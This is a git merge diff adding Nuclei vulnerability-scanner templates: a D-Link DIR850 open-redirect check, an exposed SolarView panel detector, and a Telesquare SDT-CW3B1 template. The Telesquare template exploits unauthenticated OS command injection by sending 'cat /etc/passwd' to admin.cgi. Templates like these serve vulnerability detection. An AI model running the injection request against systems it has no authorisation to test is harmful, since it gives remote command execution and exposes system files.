Merge branch 'projectdiscovery:master' into dashboard

2022-05-18 08:49:34 -04:00 · 2022-05-18 08:49:34 -04:00 · 4aed212d4b
parent fd2fb3c9d2 9b230f009a
commit 4aed212d4b
4 changed files with 95 additions and 0 deletions
--- a/.new-additions
+++ b/.new-additions
@ -3,12 +3,15 @@ cves/2018/CVE-2018-17422.yaml
 cves/2021/CVE-2021-20123.yaml
 cves/2021/CVE-2021-20124.yaml
 cves/2021/CVE-2021-25075.yaml
+cves/2021/CVE-2021-46379.yaml
+cves/2021/CVE-2021-46422.yaml
 cves/2021/CVE-2021-46424.yaml
 cves/2022/CVE-2022-1392.yaml
 cves/2022/CVE-2022-1598.yaml
 cves/2022/CVE-2022-21705.yaml
 cves/2022/CVE-2022-30489.yaml
 default-logins/octobercms-default-login.yaml
+exposed-panels/solarview-compact-panel.yaml
 exposed-panels/telesquare/tlr-2005ksh-login.yaml
 misconfiguration/oracle-ebusiness-registration-enabled.yaml
 misconfiguration/unauth-wavink-panel.yaml
--- a/cves/2021/CVE-2021-46379.yaml
+++ b/cves/2021/CVE-2021-46379.yaml
@ -0,0 +1,31 @@
+id: CVE-2021-46379
+
+info:
+  name: D-Link DIR850 ET850-1.08TRb03 - Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: DLink DIR850 ET850-1.08TRb03 is affected by an incorrect access control vulnerability through URL redirection to untrusted site.
+  reference:
+    - https://www.opencve.io/cve/CVE-2021-46379
+    - https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view
+    - https://www.cvedetails.com/cve/CVE-2021-46379
+    - https://www.dlink.com/en/security-bulletin/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-46379
+    cwe-id: CWE-601
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,redirect,dlink,router
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1'
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
--- a/cves/2021/CVE-2021-46422.yaml
+++ b/cves/2021/CVE-2021-46422.yaml
@ -0,0 +1,34 @@
+id: CVE-2021-46422
+
+info:
+  name: SDT-CW3B1 1.1.0 - OS command injection
+  author: remote
+  severity: critical
+  description: |
+    Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
+  reference:
+    - https://www.exploit-db.com/exploits/50936
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46422
+    - https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-46422
+    cwe-id: CWE-78
+  metadata:
+    verified: "false"
+  tags: cve,cve2021,injection,rce
+
+variables:
+  cmd: "cat+/etc/passwd"
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
--- a/exposed-panels/solarview-compact-panel.yaml
+++ b/exposed-panels/solarview-compact-panel.yaml
@ -0,0 +1,27 @@
+id: solarview-compact-panel
+
+info:
+  name: SolarView Compact Panel
+  author: princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"SolarView Compact"
+  tags: panel,solarview,iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Solar_Menu.php"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "SolarViewCompact"
+
+      - type: status
+        status:
+          - 200